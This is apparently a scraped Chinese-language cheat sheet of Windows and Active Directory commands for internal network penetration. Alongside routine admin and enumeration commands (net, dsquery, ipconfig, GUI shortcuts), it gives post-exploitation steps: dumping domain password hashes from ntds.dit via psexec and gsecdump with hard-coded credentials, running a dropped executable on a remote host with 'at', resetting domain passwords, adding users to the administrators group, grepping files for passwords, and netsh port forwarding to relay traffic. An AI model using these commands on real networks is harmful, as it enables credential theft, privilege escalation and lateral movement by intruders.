内网渗透命令大全

域常用操作命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
net group /domain #获得所有域用户组列表
net group qq_group /domain #显示域中qq_group组的成员
net group qq_group /del /domain #删除域中qq_group组
net group qq_group qq /del/domain #删除域内qq_group群组中的成员qq
net group qq_group /add /domain #增加域中的群组
net group "domain admins" /domain #获得域管理员列表
net group "enterprise admins" /domain #获得企业管理员列表
net localgroup administrators /domain #获取域内置administrators组用户(enterprise admins、domain admins)
net group "domain controllers" /domain #获得域控制器列表
net group "domain computers" /domain #获得所有域成员计算机列表
net user /domain #获得所有域用户列表
net user someuser /domain #获得指定账户someuser的详细信息
net accounts /domain #获得域密码策略设置,密码长短,错误锁定等信息
net view /domain #查询有几个域,查询域列表
net view /domain:testdomain #查看testdomain域中的计算机列表
nltest /domain_trusts #获取域信任信息
net user domain-admin /domain #查看管理员登陆时间,密码过期时间,是否有登陆脚本, 组分配等信息
net config Workstation #查询机器属于哪个域
net time /domain #查询主域服务器的时间
echo %logonserver% #查看登陆到这台服务器的计算机名
net time \\192.168.1.1 #查询远程共享主机192.168.1.1的时间
net use \\IP\ipc$ password /user:username@domain #ipc$域内连接
net view \\dc2.backlion.com #查看域控共享情况
dir \\dc2.backlion.com\SYSVOL /s /a >sysvol.txt #列出sysvol日志记录
xcopy \\dc2.backlion.com\sysvol.txt sysvol.txt /i /e /c #远程拷贝到本地sysvol日志
net user /domain bk bk123 #修改域内用户密码,需要管理员权限
net localgroup administrators SEZKL\backlion /add #将SEZKL域中的用户backlion添加到administrators组中
mstsc /admin #远程桌面登录到console会话解决hash无法抓出问题
gpupdate /force #更新域策略
psexec \\192.168.1.3 -u administrator -p bk1234 -c gsecdump.exe -u #从域服务器密码存储文件windows/ntds/ntds.dit导出hash值出来
gsecdump -a #获取域登管理员登录过得hash值,这里gescdump为第三方导出AD域的hash值
tasklist /S ip /U domain\username /P /V #查看远程计算机进程列

基本内网渗透命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
ipconfig /all #查看IP地址
ipconfig /release #释放地址
ipconfig /renew #重新获取Ip地址
whoami #查询账号所属权限
whoami /all #查看sid值
systeminfo #查询系统以及补丁信息
tasklist /svc #查看进程
taskkill /im 进程名称(cmd) #结束进程
taskkill /pid[进程码] -t(结束该进程) -f(强制结束该进程及所有子进程)
wmic qfe get hotfixid #查看已安装过得补丁,这个很实用
wmic qfe list full /format:htable > hotfixes.htm #详细的补丁安装
wmic qfe #查询补丁信息以及微软提供的下载地址
ping 主机名 #显示该机器名的IP
net start #查看当前运行的服务
net user #查看本地组的用户
net localgroup administrators #查看本机管理员组有哪些用户
net user #查看会话
net session #查看当前会话
net share #查看SMB指向的路径[即共享]
wmic share get name,path #查看SMB指向的路径
wmic nteventlog get path,filename,writeable #查询系统日志文件存储位置
net use \\IP\ipc$ password /user:username #建立IPC会话(工作组模式)
net use z:\\192.168.1.1 #建立映射到本机Z盘
net time \\172.16.16.2 #查询共享主机的是
at \\172.16.16.2 13:50 c:\windows\2009.exe #在共享主机上执行
netstat -ano #查看开放的端口
netstat -an | find "3389" #找到3389端口
net accounts #查看本地密码策略
nbstat -A ip #netbiso查询
net view #查看机器注释或许能得到当前活动状态的机器列 禁用netbios就查看不出来
echo %PROCESSOR_ARCHITECTURE% #查看系统是32还是64位
set #查看系统环境设置变量
net start #查看当前运行的服务
wmic service list brief #查看进程服务

内网网络结常用命令

1
2
3
4
5
6
7
8
9
10
tracert IP #路由跟踪
route print #打印路由表
arp -a #列出本网段内所有活跃的IP地址
arp -s (ip+mac) #绑定mac与ip地址
arp -d (ip+mac) #解绑mac与ip地址
nbtscan -r 192.168.16.0/24 #通过小工具nbtscan扫描整个网络
netsh firewall show config #查看防火墙策略
netsh firewall show state #查看防火墙策略
for /I %i in (1,1,255)do #批量扫描内网存活主机
@ping 10.0.0.%i -w 1 -n 1 | find /i "ttl"

Windows自带端口转发

1
2
3
4
5
6
7
8
9
10
11
netsh interface ipv6 install #首先安装IPV6(xp、2003下IPV6必须安装,否则发不可用!)
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=22 connectaddress=1.1.1.1 connectport=22 #将本机22到1.1.1.1的22
netsh interface portproxy add v4tov4 listenaddress=192.168.193.1 listenport=22 connectaddress=8.8.8.8 connectport=22
netsh interface portproxy add v4tov4 listenaddress=192.168.193.1 listenport=22 connectaddress=www.baidu.com connectport=22
netsh interface portproxy show all #查看转发配置
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=22 #删除配置
netsh firewall set portopening protocol=tcp port=22 name=Forward mode=enable scope=all profile=all #添加防火墙规则,允许连接 22
findstr /si password *.xml *.ini *.txt #查看后缀名文件中含有password关键字的文件
findstr /si login *.xml *.ini *.txt #查看后缀名文件中含有login关键字的文件
copy con ftp.bat #创建ftp.bat批处理,然后输入ifconfig等命令ctrl+z退出,并创建成功
copy con test.vbs #创建test.vbs脚本,输入脚本后,按ctrl+z退出,并创建成功

dsquery的AD查询工具

1
2
3
4
5
6
7
8
9
10
11
12
13
dsquery user domainroot -limit 65535 && net user /domain #列出该域内所有用户名
dsquery server -domain super.com | dsget server -dnsname -site #搜索域内所有域控制器并显示他们的DNS主机名 名称
dsquery contact #寻找目录中的联系人
dsquery subnet #列出该域内网段划分
query user #查询那些用户在线
dsquery group && net group /domain #列出该域内分组
dsquery ou #列出该域内组织单位
dsquery server && net time /domain #列出该域内域控制器
dsquery site -o rdn #搜索域中所有站点的名称
dsquery group dc=super,dc=com | more #搜索在DC=SUPER,DC=COM域中的所有组
psloggedon.exe #查询那台主机和用户登录到该主机上
netsess.exe //192.168.1.115 #远程主机上无需管理员权限,查询到主机名和用户
reg query "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\TERMINAL SERVERCLIENT\DEFAULT" #获取最近mstsc登录的记录

DOS常用快捷命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
mspaint #画图工具
calc #计算器
notepad #记事本
taskmgr #任务管理器
osk #打开屏幕键盘
gpedit.msc #组策略
services.msc #本地服务
compmgmt.msc #计算机管理
devmgmt.msc #设备管理器
winver #查看系统版本
magnify #放大镜实用程序
eventvwr #事件查看器
Regedit #打开注册表
resmon #资源监视器
WMIC BIOS get release date #查看电脑生产日期
mstsc -f #